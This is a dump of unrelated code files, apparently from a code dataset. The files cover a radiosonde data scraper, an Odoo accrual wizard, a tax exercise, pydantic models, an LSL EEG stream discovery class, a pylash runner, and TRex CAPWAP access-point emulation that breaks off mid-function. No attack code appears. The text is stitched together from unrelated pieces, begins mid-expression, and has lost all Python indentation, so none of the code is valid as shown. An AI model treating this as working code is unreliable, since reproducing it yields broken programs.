return ",".join(self._items) | StarcoderdataPython |
179129 | import numpy as np
import pandas as pd
from datetime import datetime, timedelta
import calendar
import re
from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
def get_uwyo_sounding(year, month, FROM, TO, stnm, save_csv = False ):
url = f'http://weather.uwyo.edu/cgi-bin/sounding?region=europe&TYPE=TEXT%3ALIST&YEAR={year}&MONTH={month:02d}&FROM={FROM:04d}&TO={TO:04d}&STNM={stnm}'
# only the STNM is useful, not the region
uwyo = requests.get(url)
uwyo_soup = BeautifulSoup(uwyo.text, 'html.parser')
data = uwyo_soup.find_all('pre') # list of each sounding between FROM and TO
title = uwyo_soup.find_all('h2') # the title of each sounding in the form "...Observations at %HZ %d %b %Y"
data_sounding = data[::2] # excludes station information and sounding indices, keeps only the table of measurements
info_sounding = data[1::2] # keeps only Station information and sounding indices
columns_name=['PRES(hPa)', 'HGHT(m)', 'TEMP(C)', 'DWPT(C)', 'RELH(%)', 'MIXR(g/kg)', 'DRCT(deg)', 'SKNT(knot)', 'THTA(K)', 'THTE(K)', 'THTV(K)']
result = pd.DataFrame()
for i, table in enumerate(data_sounding):
table = str(table).split('\n')[5:-1] # list of lines of the table without the header and HTML tags
table = [[float(i) if i else np.nan for i in re.split("\s{1,6}", j)[1:]]for j in table] # list(each line of the table) of list(each column) with values as float
# It appends that there are no mesurments for the first lines, if it is the case then the first lines don't have the right len
table = [line[:11] for line in table]
date = re.findall("[0-9]*Z [0-9][0-9] \w* [0-9]{4}",str(title[i]))[0] # the date from the title, format = '%HZ %d %b %Y'
date = datetime.strptime(date, '%HZ %d %b %Y')
df = pd.DataFrame(table, columns = columns_name)
df['DATE']=date # convert the list to pandas DataFrame to wich a column date is added
result = pd.concat([result, df])
result.set_index(['DATE','HGHT(m)'], inplace = True) #DataFrame with multi index level1 date and level2 alt(m)
if save_csv:
result.to_csv(f'{stnm}_{year}{month:02d}_{FROM:04d}_{TO:04d}.csv')
return result
def get_soundings_by_dates(stnm, start,stop, save_csv = False):
'''region in {'samer': 'South America', 'europe': 'Europe', 'naconf': 'North America', 'pac': 'South Pacific',
'nz': 'New Zealand','ant': 'Antartica', 'np': 'Artic', 'africa': 'Africa', 'seasia': 'South-East Asia',
'mideast': 'Middle East'}
stnm : station number
start, stop : 'YYYYMMDDHH'
'''
start, stop = [datetime.strptime(_, '%Y%m%d%H') for _ in [start,stop]] # start, stop as datetime
total_months = lambda dt: dt.month + 12 * dt.year
tot_m = total_months(stop)-total_months(start)+1 # number of months to itterate on
result = pd.DataFrame()
start_tmp = start
for i in tqdm(range(tot_m)):
FROM = start_tmp
_, day_max=calendar.monthrange(start_tmp.year, start_tmp.month)
TO = datetime(start_tmp.year, start_tmp.month, day_max, 12)
if TO>=stop:
TO = stop
start_tmp = TO + timedelta(days=1) # change start value for next month
df = get_uwyo_sounding(FROM.year, FROM.month, int(f'{FROM.day}{FROM.hour:02d}'), int(f'{TO.day}{TO.hour:02d}'), stnm, save_csv = False )
result = pd.concat([result,df])
if save_csv:
result.to_csv(f'{stnm}__{start}_{stop}.csv')
return result
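# Example call (the station number and date range here are hypothetical):
#     df = get_soundings_by_dates(stnm=16622, start='2020010100', stop='2020013112')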
| StarcoderdataPython |
46952 | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools.misc import format_date
class AccrualAccountingWizard(models.TransientModel):
_name = 'account.accrual.accounting.wizard'
_description = 'Create accrual entry.'
date = fields.Date(required=True)
company_id = fields.Many2one('res.company', required=True)
account_type = fields.Selection([('income', 'Revenue'), ('expense', 'Expense')])
active_move_line_ids = fields.Many2many('account.move.line')
journal_id = fields.Many2one('account.journal', required=True, readonly=False,
domain="[('company_id', '=', company_id), ('type', '=', 'general')]",
related="company_id.accrual_default_journal_id")
expense_accrual_account = fields.Many2one('account.account', readonly=False,
domain="[('company_id', '=', company_id), ('internal_type', 'not in', ('receivable', 'payable')), ('internal_group', '=', 'liability'), ('reconcile', '=', True)]",
related="company_id.expense_accrual_account_id")
revenue_accrual_account = fields.Many2one('account.account', readonly=False,
domain="[('company_id', '=', company_id), ('internal_type', 'not in', ('receivable', 'payable')), ('internal_group', '=', 'asset'), ('reconcile', '=', True)]",
related="company_id.revenue_accrual_account_id")
percentage = fields.Float("Percentage", default=100.0)
total_amount = fields.Monetary(compute="_compute_total_amount", currency_field='company_currency_id')
company_currency_id = fields.Many2one('res.currency', related='company_id.currency_id')
@api.constrains('percentage')
def _constraint_percentage(self):
for record in self:
if not (0.0 < record.percentage <= 100.0):
raise UserError(_("Percentage must be between 0 and 100"))
@api.depends('percentage', 'active_move_line_ids')
def _compute_total_amount(self):
for record in self:
record.total_amount = sum(record.active_move_line_ids.mapped(lambda l: record.percentage * (l.debit + l.credit) / 100))
@api.model
def default_get(self, fields):
if self.env.context.get('active_model') != 'account.move.line' or not self.env.context.get('active_ids'):
raise UserError(_('This can only be used on journal items'))
rec = super(AccrualAccountingWizard, self).default_get(fields)
active_move_line_ids = self.env['account.move.line'].browse(self.env.context['active_ids'])
rec['active_move_line_ids'] = active_move_line_ids.ids
if any(move.state != 'posted' for move in active_move_line_ids.mapped('move_id')):
raise UserError(_('You can only change the period for posted journal items.'))
if any(move_line.reconciled for move_line in active_move_line_ids):
raise UserError(_('You can only change the period for items that are not yet reconciled.'))
if any(line.account_id.user_type_id != active_move_line_ids[0].account_id.user_type_id for line in active_move_line_ids):
raise UserError(_('All accounts on the lines must be from the same type.'))
if any(line.company_id != active_move_line_ids[0].company_id for line in active_move_line_ids):
raise UserError(_('All lines must be from the same company.'))
rec['company_id'] = active_move_line_ids[0].company_id.id
account_types_allowed = self.env.ref('account.data_account_type_expenses') + self.env.ref('account.data_account_type_revenue') + self.env.ref('account.data_account_type_other_income')
if active_move_line_ids[0].account_id.user_type_id not in account_types_allowed:
raise UserError(_('You can only change the period for items in these types of accounts: ') + ", ".join(account_types_allowed.mapped('name')))
rec['account_type'] = active_move_line_ids[0].account_id.user_type_id.internal_group
return rec
def amend_entries(self):
# set the accrual account on the selected journal items
accrual_account = self.revenue_accrual_account if self.account_type == 'income' else self.expense_accrual_account
# Generate journal entries.
move_data = {}
for aml in self.active_move_line_ids:
ref1 = _('Accrual Adjusting Entry (%s%% recognized) for invoice: %s') % (self.percentage, aml.move_id.name)
ref2 = _('Accrual Adjusting Entry (%s%% recognized) for invoice: %s') % (100 - self.percentage, aml.move_id.name)
move_data.setdefault(aml.move_id, (
[
# Values to create moves.
{
'date': self.date,
'ref': ref1,
'journal_id': self.journal_id.id,
'line_ids': [],
},
{
'date': aml.move_id.date,
'ref': ref2,
'journal_id': self.journal_id.id,
'line_ids': [],
},
], [
# Messages to log on the chatter.
(_('Accrual Adjusting Entry ({percent}% recognized) for invoice:') + ' <a href=# data-oe-model=account.move data-oe-id={id}>{name}</a>').format(
percent=self.percentage,
id=aml.move_id.id,
name=aml.move_id.name,
),
(_('Accrual Adjusting Entry ({percent}% recognized) for invoice:') + ' <a href=# data-oe-model=account.move data-oe-id={id}>{name}</a>').format(
percent=100 - self.percentage,
id=aml.move_id.id,
name=aml.move_id.name,
),
(_('Accrual Adjusting Entries ({percent}%% recognized) have been created for this invoice on {date}') + ' <a href=# data-oe-model=account.move data-oe-id=%(first_id)d>%(first_name)s</a> and <a href=# data-oe-model=account.move data-oe-id=%(second_id)d>%(second_name)s</a>').format(
percent=self.percentage,
date=format_date(self.env, self.date),
),
]
))
reported_debit = aml.company_id.currency_id.round((self.percentage / 100) * aml.debit)
reported_credit = aml.company_id.currency_id.round((self.percentage / 100) * aml.credit)
if aml.currency_id:
reported_amount_currency = aml.currency_id.round((self.percentage / 100) * aml.amount_currency)
else:
reported_amount_currency = 0.0
move_data[aml.move_id][0][0]['line_ids'] += [
(0, 0, {
'name': aml.name,
'debit': reported_debit,
'credit': reported_credit,
'amount_currency': reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': aml.account_id.id,
'partner_id': aml.partner_id.id,
}),
(0, 0, {
'name': ref1,
'debit': reported_credit,
'credit': reported_debit,
'amount_currency': -reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': accrual_account.id,
'partner_id': aml.partner_id.id,
}),
]
move_data[aml.move_id][0][1]['line_ids'] += [
(0, 0, {
'name': aml.name,
'debit': reported_credit,
'credit': reported_debit,
'amount_currency': -reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': aml.account_id.id,
'partner_id': aml.partner_id.id,
}),
(0, 0, {
'name': ref2,
'debit': reported_debit,
'credit': reported_credit,
'amount_currency': reported_amount_currency,
'currency_id': aml.currency_id.id,
'account_id': accrual_account.id,
'partner_id': aml.partner_id.id,
}),
]
move_vals = []
log_messages = []
for v in move_data.values():
move_vals += v[0]
log_messages += v[1]
created_moves = self.env['account.move'].create(move_vals)
created_moves.post()
# Reconcile.
index = 0
for move in self.active_move_line_ids.mapped('move_id'):
accrual_moves = created_moves[index:index + 2]
to_reconcile = accrual_moves.mapped('line_ids').filtered(lambda line: line.account_id == accrual_account)
to_reconcile.reconcile()
move.message_post(body=log_messages[index//2 + 2] % {
'first_id': accrual_moves[0].id,
'first_name': accrual_moves[0].name,
'second_id': accrual_moves[1].id,
'second_name': accrual_moves[1].name,
})
accrual_moves[0].message_post(body=log_messages[index//2 + 0])
accrual_moves[1].message_post(body=log_messages[index//2 + 1])
index += 2
# open the generated entries
action = {
'name': _('Generated Entries'),
'domain': [('id', 'in', created_moves.ids)],
'res_model': 'account.move',
'view_mode': 'tree,form',
'type': 'ir.actions.act_window',
'views': [(self.env.ref('account.view_move_tree').id, 'tree'), (False, 'form')],
}
if len(created_moves) == 1:
action.update({'view_mode': 'form', 'res_id': created_moves.id})
return action
| StarcoderdataPython |
6426696 | <reponame>AtosNeves/Beecrowd
s = float(input())
if s <= 2000:
print("Isento")
elif 2000.01 <= s <= 3000:
s1 = s - 2000
s2 = s1 * 0.08
print(f"R$ {s2:.2f}")
elif 3000.01 <= s <= 4500:
a = 1000 * 0.08
s1 = s - 3000
s2 = s1 * 0.18
st = s2 + a
print(f"R$ {st:.2f}")
elif s > 4500:
a = 1000 * 0.08
b = 1500 * 0.18
s5 = s - 4500
s6 = s5 * 0.28
stt = a + b + s6
print(f"R$ {stt:.2f}")
| StarcoderdataPython |
3549991 | from datetime import datetime
from uuid import UUID
from pydantic import BaseModel
from app.domain.models.WorkflowMetadata import WorkflowMetadataTypes
class WorkflowMetadata(BaseModel):
"""
Used as the response model for WorkflowMetadata.
"""
id: int
overforingspakke_id: int
workflow_type: WorkflowMetadataTypes
workflow_name: str
workflow_uid: UUID
opprettet: datetime
class Config:
orm_mode = True
| StarcoderdataPython |
11252277 | from datetime import datetime, date
from typing import Optional
from pydantic import BaseModel, validator
class ExchangeItem(BaseModel):
"""
Exchange item to convert from currency to another
attrs:
currency_from: Currency a given amount is exchanged from
currency_to: Currency to which a given amount is exchanged
amount: Amount to be exchanged
historic_date: Date for which the currency exchange is to be made
"""
currency_from: str
currency_to: str
amount: float
historic_date: Optional[date] = None
@validator("historic_date", pre=True)
def ensure_date_format(cls, value):
if value:
return datetime.strptime(value, "%Y-%m-%d").date()
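# Illustrative instantiation (currencies and values are examples only):
#     item = ExchangeItem(currency_from="USD", currency_to="EUR", amount=100.0,
#                         historic_date="2021-06-01")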
| StarcoderdataPython |
376904 | """
Discovery Module for LSL stream discovery and data retrieval
"""
import logging
from threading import current_thread, Thread
from pylsl import resolve_bypred, LostError, TimeoutError, resolve_streams
from .stream import Stream
class Discovery:
"""
Class representing the available LSL stream information and incoming data
"""
def __init__(self, **options):
"""
:param options: additional arguments for creating Stream object
"""
self.logger = logging.getLogger(__name__)
self.options = options
self.sample_rate = None
self.channel_count = None
self.streams_by_uid = {}
self.running = False
self.thread = None
def start(self):
"""
Start the thread to resolve LSL streams
"""
if self.thread:
return False
self.thread = Thread(target=self._refresh, daemon=True, name="Discovery")
self.running = True
self.thread.start()
return True
def stop(self):
"""
Stop LSL stream search
"""
if not self.thread:
return True
self.running = False
if current_thread() is not self.thread:
self.thread.join()
self.thread = None
return True
def streams(self):
"""
:return: a list of Stream objects
"""
return list(self.streams_by_uid.values())
def _refresh(self):
while self.running:
self._resolve()
def _resolve(self):
"""
Search for available EEG streams on LSL and connect to them by saving them as Stream objects
"""
# resolve EEG streams and retrieve their information
streams_info = resolve_bypred("type='EEG'", 0, 2.5)
streams_active = []
self.logger.debug("Found {} available streams".format(len(streams_info)))
# iterate for each stream
for stream_info in streams_info:
# uid = stream_info.source_id() if stream_info.source_id() else stream_info.uid() # retrieve 'source_id'
uid = stream_info.source_id() + ' | ' + stream_info.uid()
streams_active.append(uid)
# if the current stream has not been saved, then connect to the current stream
if uid not in self.streams_by_uid:
if self._validate_stream_signature(stream_info):
self._connect_to(uid, stream_info)
# if the current stream is already saved, but is not running, then disconnect
if uid in self.streams_by_uid:
if not self.streams_by_uid[uid].running:
self._disconnect_from({uid})
self._disconnect_from(list(set(self.streams_by_uid.keys()) - set(streams_active)))
def _validate_stream_signature(self, stream_info):
"""
checking if the input stream's sampling rate and channel count match those of the previous stream
:param stream_info: current stream information
"""
if self.sample_rate and self.sample_rate != stream_info.nominal_srate():
return False
if self.channel_count and self.channel_count != stream_info.channel_count():
return False
return True
def _connect_to(self, uid, stream_info):
"""
Connect to the stream using the stream information
:param uid: the stream ID (source_id combined with the LSL uid)
:param stream_info: stream information
"""
stream = None
try:
self.logger.info("{}: Discovered at {}hz with {} channels, connecting".format(stream_info.name(), stream_info.nominal_srate(), stream_info.channel_count()))
# create the Stream object using retrieved stream information
stream = Stream(uid, stream_info, **self.options)
stream.start() # start the Stream thread
self.logger.warning("{}: Connected".format(stream_info.name()))
except (LostError, TimeoutError):
self.logger.warning("{}: Could not connect".format(stream_info.name()))
if stream:
if len(self.streams_by_uid) == 0:
self.sample_rate = stream.sample_rate
self.channel_count = stream.channel_count
self.logger.info("{}: Elected master stream at {}hz with {} channels".format(stream.name, stream.sample_rate, stream.channel_count))
self.streams_by_uid[uid] = stream
def _disconnect_from(self, inactive_uids):
"""
Disconnect from streams using their IDs
:param inactive_uids: inactive streams' IDs
"""
for uid in inactive_uids:
if self.streams_by_uid[uid].running:
self.logger.info("{}: Disconnected, killing thread".format(self.streams_by_uid[uid].name))
self.streams_by_uid[uid].stop()
else:
self.logger.info("{}: Killed, cleaning up".format(self.streams_by_uid[uid].name))
del self.streams_by_uid[uid]
if len(self.streams_by_uid) == 0:
self.sample_rate = None
self.channel_count = None
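# Minimal usage sketch (assumes at least one EEG stream is being published over LSL):
#     discovery = Discovery()
#     discovery.start()
#     time.sleep(5)  # give the resolver a moment to find streams
#     for stream in discovery.streams():
#         print(stream.name, stream.sample_rate, stream.channel_count)
#     discovery.stop()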
| StarcoderdataPython |
9799609 | <reponame>yuehaowang/pylash_engine<filename>run.py
'''
This is a script tool for running demo and examples made with pylash.
With this tool, you can run demo and examples without installing pylash.
'''
import runpy, sys, os
__author__ = "<NAME>"
ENTRANCE_FILE = "Main.py"
PYLASH_ROOT_DIR = os.path.dirname(__file__)
AVAILABLE_TARGET_NAME = [
"%s.%s" % (os.path.basename(path), f) \
for path in [os.path.join(PYLASH_ROOT_DIR, "demo"), os.path.join(PYLASH_ROOT_DIR, "examples")] \
for f in os.listdir(path) \
if os.path.isdir(os.path.join(path, f))
]
HELP_TEXT = '''
usage: python run.py TARGET_NAME
Available TARGET_NAME:
%s
''' % ("\n ".join(AVAILABLE_TARGET_NAME))
def main():
if len(sys.argv) <= 1:
print(HELP_TEXT)
return
argv = sys.argv[1:]
target_name = argv[0].strip()
if target_name in AVAILABLE_TARGET_NAME:
pathList = target_name.split(".")
dirPath = os.path.join(PYLASH_ROOT_DIR, *pathList)
entrancePath = os.path.join(dirPath, ENTRANCE_FILE)
if not os.path.isdir(dirPath) or not os.path.isfile(entrancePath):
print(HELP_TEXT)
else:
os.chdir(dirPath)
sys.path.insert(0, PYLASH_ROOT_DIR)
runpy.run_path(ENTRANCE_FILE, run_name = "__main__")
else:
print(HELP_TEXT)
main()
| StarcoderdataPython |
22964 | # coding=utf-8
# init
| StarcoderdataPython |
9623364 | <filename>scripts/automation/trex_control_plane/interactive/trex/common/services/trex_service_ap.py
from trex.stl.api import *
from trex.utils.text_opts import *
from trex.utils.common import natural_sorted_key
from .trex_service import Service, ServiceFilter
from .trex_service_int import ServiceCtx, simpy, TXBuffer
import time
from collections import deque
from scapy.all import *
from scapy.contrib.capwap import *
from trex_openssl import *
import threading
import struct
import sys
import time
import base64
'''
FSMs for AP:
* Discover WLC
* Establish DTLS session
* Join WLC
* Add client (station)
* Shutdown DTLS session
* Maintenance (arp, ping, capwap echo request, fetches rx and dispatches to rx_buffer of APs)
'''
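# Note on the FSM implementation below: each ServiceAp subclass drives its logic
# from a generator (run_with_buffer) that yields action tuples such as
# ('put', pkt), ('get', timeout), ('sleep', secs), 'done', ('err', msg) or 'time'.
# ServiceAp.run() interprets these actions, performs the actual TX/RX through the
# service pipe, and resumes the generator with any received packet, so the per-AP
# state machines stay free of blocking I/O.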
class ServiceBufferedCtx(ServiceCtx):
''' Same as parent, but does not use capture to get packets, uses AP's rx_buffer '''
def _run(self, services):
self._reset()
self._add(services)
if len(self.filters) > 1:
raise Exception('Services here should have one common filter per AP')
self.filter = list(self.filters.values())[0]['inst']
if not hasattr(self.filter, 'services_per_ap'):
raise Exception('Services here should have filter with attribute services_per_ap, got %s, type: %s' % (self.filter, type(self.filter)))
# create an environment
self.env = simpy.rt.RealtimeEnvironment(factor = 1, strict = False)
self.tx_buffer = TXBuffer(self.env, self.client, self.port, 99, 1)
# create processes
for service in self.services:
pipe = self._pipe()
self.services[service]['pipe'] = pipe
p = self.env.process(service.run(pipe))
self._on_process_create(p)
try:
tick_process = self.env.process(self._tick_process())
self.env.run(until = tick_process)
finally:
self._reset()
def _tick_process (self):
while True:
self.tx_buffer.send_all()
for ap, services in self.filter.services_per_ap.items():
for _ in range(len(ap.rx_buffer)):
try:
scapy_pkt = ap.rx_buffer.popleft()
except IndexError:
break
for service in services:
self.services[service]['pipe']._on_rx_pkt(scapy_pkt, None)
# if no other process exists - exit
if self.is_done():
return
else:
# backoff
yield self.env.timeout(0.05)
'''
Just assign services to AP, it will get packets from AP's rx_buffer
'''
class ServiceFilterPerAp(ServiceFilter):
def __init__(self):
self.services_per_ap = {}
def add(self, service):
if service.ap in self.services_per_ap:
self.services_per_ap[service.ap].append(service)
else:
self.services_per_ap[service.ap] = [service]
'''
Used to fetch RX packets for all APs
Decrypts them if possible
Sends echo request (control keep alive)
Answers to async config changes
Does not use SimPy
'''
class ServiceApBgMaintenance:
bpf_filter = ('arp or (ip and (icmp or udp src port 5246 or ' # arp, ping, capwap control
+ '(udp src port 5247 and (udp[11] & 8 == 8 or ' # capwap data keep-alive
+ 'udp[16:2] == 16 or ' # client assoc. resp
+ 'udp[48:2] == 2054 or ' # client arp
+ '(udp[48:2] == 2048 and udp[59] == 1)))))') # client ping
ARP_ETHTYPE = b'\x08\x06'
IP_ETHTYPE = b'\x08\x00'
ICMP_PROTO = b'\x01'
UDP_PROTO = b'\x11'
CAPWAP_CTRL_PORT = b'\x14\x7e'
CAPWAP_DATA_PORT = b'\x14\x7f'
WLAN_ASSOC_RESP = b'\x00\x10'
ARP_REQ = b'\x00\x01'
ARP_REP = b'\x00\x02'
ICMP_REQ = b'\x08'
def __init__(self, ap_mngr, port_id):
self.ap_mngr = ap_mngr
self.port_id = port_id
self.ap_per_ip = {}
self.client_per_mac = {}
self.client_per_ip = {}
self.bg_client = self.ap_mngr.bg_client
self.port = self.bg_client.ports[port_id]
self.capture_id = None
self.bg_thread = None
self.send_pkts = []
################
# API #
################
def run(self):
self.bg_thread = threading.Thread(target = self.main_loop_wrapper)
self.bg_thread.name = 'BG Thread (port %s)' % self.port_id
self.bg_thread.daemon = True
self.bg_thread.start()
def is_running(self):
return self.bg_thread and self.bg_thread.is_alive()
def stop(self):
capture_id = self.capture_id
self.capture_id = None
try:
self.bg_client.stop_capture(capture_id)
except:
pass
##################
# INTERNAL #
##################
def AP_ARP_RESP_TEMPLATE(self, src_mac, dst_mac, src_ip, dst_ip):
return (
dst_mac + src_mac + self.ARP_ETHTYPE + # Ethernet
b'\x00\x01\x08\x00\x06\x04\x00\x02' + src_mac + src_ip + dst_mac + dst_ip # ARP
)
def log(self, msg, level = Logger.VERBOSES['warning']):
if not msg.startswith('(WLC) '):
msg = '(WLC) %s' % msg
self.ap_mngr.trex_client.logger.async_log('\n' + bold(msg), level)
def err(self, msg):
self.log(msg, Logger.VERBOSES['error'])
def fatal(self, msg):
self.log(msg, Logger.VERBOSES['critical'])
self.stop()
def send(self, pkts):
assert type(pkts) is list
push_pkts = [{'binary': base64.b64encode(bytes(p) if isinstance(p, Ether) else p).decode(),
'use_port_dst_mac': False,
'use_port_src_mac': False} for p in pkts]
rc = self.port.push_packets(push_pkts, False, ipg_usec = 1)
#if not rc:
# self.err(rc.err())
def recv(self):
pkts = []
self.bg_client.fetch_capture_packets(self.capture_id, pkts, 10000)
if len(pkts) > 9995:
self.err('Too many packets in rx queue (%s)' % len(pkts))
return pkts
def shutdown_ap(self, ap):
try:
for client in ap.clients:
client.disconnect()
if ap.is_dtls_established:
with ap.ssl_lock:
libssl.SSL_shutdown(ap.ssl)
tx_pkt = ap.wrap_capwap_pkt(b'\1\0\0\0' + ap.ssl_read())
self.send([tx_pkt])
finally:
ap.reset_vars()
def main_loop_wrapper(self):
err_msg = ''
self.capture_id = self.bg_client.start_capture(rx_ports = self.port_id, bpf_filter = self.bpf_filter, limit = 10000)['id']
try:
#with Profiler_Context(20):
self.main_loop()
except KeyboardInterrupt:
pass
except Exception as e:
if self.capture_id: # if no id -> got stop()
if not isinstance(e, STLError):
import traceback
traceback.print_exc()
err_msg = ' (Exception: %s)' % e
finally:
if not self.capture_id:
return
try:
self.bg_client.stop_capture(self.capture_id)
except:
pass
if self.port_id in self.ap_mngr.service_ctx:
if self.ap_per_ip:
self.err('Background thread on port %s died%s. Disconnecting APs.' % (self.port_id, err_msg))
else:
self.err('Background thread on port %s died%s.' % (self.port_id, err_msg))
for ap in self.ap_per_ip.values():
self.shutdown_ap(ap)
def handle_ap_arp(self, rx_bytes):
src_ip = rx_bytes[28:32]
dst_ip = rx_bytes[38:42]
if src_ip == dst_ip: # GARP
return
if dst_ip not in self.ap_per_ip: # check IP
return
ap = self.ap_per_ip[dst_ip]
src_mac = rx_bytes[6:12]
dst_mac = rx_bytes[:6]
if dst_mac not in (b'\xff\xff\xff\xff\xff\xff', ap.mac_bytes): # check MAC
ap.err('Bad MAC (%s) of AP %s' % (str2mac(dst_mac), ap.name))
return
if ap.is_debug:
ap.debug('AP %s got ARP' % ap.name)
Ether(rx_bytes).show2()
if rx_bytes[20:22] == self.ARP_REQ: # 'who-has'
tx_pkt = self.AP_ARP_RESP_TEMPLATE(
src_mac = ap.mac_bytes,
dst_mac = src_mac,
src_ip = dst_ip,
dst_ip = src_ip,
)
#Ether(tx_pkt).show2()
self.send_pkts.append(tx_pkt)
elif rx_bytes[20:22] == self.ARP_REP: # 'is-at'
# ap.rx_buffer.append(Ether(rx_bytes))
if src_ip == ap.wlc_ip_bytes:
ap.mac_dst_bytes = src_mac
ap.mac_dst = str2mac(src_mac)
def handle_ap_icmp(self, rx_bytes, ap):
rx_pkt = Ether(rx_bytes)
icmp_pkt = rx_pkt[ICMP]
if icmp_pkt.type == 8: # echo-request
#print 'Ping to AP!'
#rx_pkt.show2()
if rx_pkt[IP].dst == ap.ip: # ping to AP
tx_pkt = rx_pkt.copy()
tx_pkt.src, tx_pkt.dst = tx_pkt.dst, tx_pkt.src
tx_pkt[IP].src, tx_pkt[IP].dst = tx_pkt[IP].dst, tx_pkt[IP].src
tx_pkt[ICMP].type = 'echo-reply'
del tx_pkt[ICMP].chksum
#tx_pkt.show2()
self.send_pkts.append(tx_pkt)
#elif icmp_pkt.type == 0: # echo-reply
# ap.rx_buffer.append(rx_pkt)
def process_capwap_ctrl(self, rx_bytes, ap):
ap.info('Got CAPWAP CTRL at AP %s' % ap.name)
if ap.is_debug:
rx_pkt = Ether(rx_bytes)
rx_pkt.show2()
rx_pkt.dump_offsets_tree()
if not ap.is_dtls_established:
if rx_bytes[42:43] == b'\0': # discovery response
capwap_bytes = rx_bytes[42:]
capwap_hlen = (struct.unpack('!B', capwap_bytes[1:2])[0] & 0b11111000) >> 1
ctrl_header_type = struct.unpack('!B', capwap_bytes[capwap_hlen+3:capwap_hlen+4])[0]
if ctrl_header_type != 2:
return
ap.mac_dst_bytes = rx_bytes[6:12]
ap.mac_dst = str2mac(ap.mac_dst_bytes)
ap.wlc_ip_bytes = rx_bytes[26:30]
ap.ip_dst = str2ip(ap.wlc_ip_bytes)
result_code = CAPWAP_PKTS.parse_message_elements(capwap_bytes, capwap_hlen, ap, self.ap_mngr)
ap.rx_responses[2] = result_code
elif rx_bytes[42:43] == b'\1': # dtls handshake
ap.rx_buffer.append(rx_bytes)
return
is_dtls = struct.unpack('?', rx_bytes[42:43])[0]
if not is_dtls: # dtls is established, ctrl should be encrypted
return
if (rx_bytes[46:47] == b'\x15'): # DTLS alert
ap.is_dtls_closed = True
ap.is_connected = False
self.err("Server sent DTLS alert to AP '%s'." % ap.name)
rx_pkt_buf = ap.decrypt(rx_bytes[46:])
if not rx_pkt_buf:
return
if rx_pkt_buf[0:1] not in (b'\0', b'\1'): # definitely not CAPWAP... should we debug it?
ap.debug('Not CAPWAP, skipping: %s' % hex(rx_pkt_buf))
return
#rx_pkt = CAPWAP_CTRL(rx_pkt_buf)
ap.last_recv_ts = time.time()
if ap.is_debug:
CAPWAP_CTRL(rx_pkt_buf).show2()  # rx_pkt is not built on this path; show the decrypted buffer instead
capwap_assemble = ap.capwap_assemble
if struct.unpack('!B', rx_pkt_buf[3:4])[0] & 0x80: # is_fragment
rx_pkt = CAPWAP_CTRL(rx_pkt_buf)
if capwap_assemble:
assert ap.capwap_assemble['header'].fragment_id == rx_pkt.header.fragment_id, 'Got out-of-order CAPWAP fragments (different fragment ids)'
control_str = bytes(rx_pkt[CAPWAP_Control_Header_Fragment])
if rx_pkt.header.fragment_offset * 8 != len(capwap_assemble['buf']):
self.err('Fragment offset and data length mismatch')
capwap_assemble.clear()
return
#if rx_pkt.header.fragment_offset * 8 > len(capwap_assemble['buf']):
# print('Fragment offset: %s, data so far length: %s (not enough data)' % (rx_pkt.header.fragment_offset, len(capwap_assemble['buf'])))
#elif rx_pkt.header.fragment_offset * 8 < len(capwap_assemble['buf']):
# capwap_assemble['buf'] = capwap_assemble['buf'][:rx_pkt.header.fragment_offset * 8]
capwap_assemble['buf'] += control_str
if rx_pkt.is_last_fragment():
capwap_assemble['assembled'] = CAPWAP_CTRL(
header = capwap_assemble['header'],
control_header = CAPWAP_Control_Header(capwap_assemble['buf'])
)
else:
if rx_pkt.is_last_fragment():
self.err('Got CAPWAP first fragment that is also last fragment!')
return
if rx_pkt.header.fragment_offset != 0:
rx_pkt.show2()
self.err('Got out of order CAPWAP fragment, does not start with zero offset')
return
capwap_assemble['header'] = rx_pkt.header
capwap_assemble['header'].flags &= ~0b11000
capwap_assemble['buf'] = bytes(rx_pkt[CAPWAP_Control_Header_Fragment])
capwap_assemble['ap'] = ap
elif capwap_assemble:
self.err('Got a non-fragment packet in the middle of fragment reassembly (out of order).')
capwap_assemble.clear()
else:
capwap_assemble['assembled'] = rx_pkt_buf
rx_pkt_buf = capwap_assemble.get('assembled')
if not rx_pkt_buf or rx_pkt_buf[0:1] != b'\0':
return
capwap_assemble.clear()
#rx_pkt = CAPWAP_CTRL(rx_pkt_buf)
#rx_pkt.show2()
#rx_pkt.dump_offsets_tree()
if ap.is_debug:
CAPWAP_CTRL(rx_pkt_buf).show2()
capwap_hlen = (struct.unpack('!B', rx_pkt_buf[1:2])[0] & 0b11111000) >> 1
ctrl_header_type = struct.unpack('!B', rx_pkt_buf[capwap_hlen+3:capwap_hlen+4])[0]
if ctrl_header_type == 7: # Configuration Update Request
#rx_pkt.show2()
CAPWAP_PKTS.parse_message_elements(rx_pkt_buf, capwap_hlen, ap, self.ap_mngr) # get info from incoming packet
seq = struct.unpack('!B', rx_pkt_buf[capwap_hlen+4:capwap_hlen+5])[0]
tx_pkt = ap.get_config_update_capwap(seq)
if ap.is_debug:
CAPWAP_CTRL(tx_pkt.value).show2()
self.send_pkts.append(ap.wrap_capwap_pkt(b'\1\0\0\0' + ap.encrypt(tx_pkt)))
elif ctrl_header_type == 14: # Echo Response
ap.echo_resp_timer = None
elif ctrl_header_type == 17: # Reset Request
self.err('AP %s got Reset request, shutting down' % ap.name)
#self.send_pkts.append(ap.wrap_capwap_pkt(b'\1\0\0\0' + ap.encrypt(tx_pkt)))
self.shutdown_ap(ap)
elif ctrl_header_type in (4, 6, 12):
result_code = CAPWAP_PKTS.parse_message_elements(rx_pkt_buf, capwap_hlen, ap, self.ap_mngr)
ap.rx_responses[ctrl_header_type] = result_code
else:
CAPWAP_CTRL(rx_pkt_buf).show2()  # rx_pkt may be undefined on this path; show the raw control buffer
ap.err('Got unhandled capwap header type: %s' % ctrl_header_type)
def handle_client_arp(self, dot11_bytes, ap):
ip = dot11_bytes[58:62]
client = self.client_per_ip.get(ip)
if not client:
return
if client.ap is not ap:
self.err('Got ARP to client %s via wrong AP (%s)' % (client.ip, ap.name))
return
if dot11_bytes[40:42] == self.ARP_REQ: # 'who-has'
if dot11_bytes[48:52] == dot11_bytes[58:62]: # GARP
return
tx_pkt = ap.wrap_pkt_by_wlan(client, ap.get_arp_pkt('is-at', src_mac_bytes=client.mac_bytes, src_ip_bytes=client.ip_bytes))
self.send_pkts.append(tx_pkt)
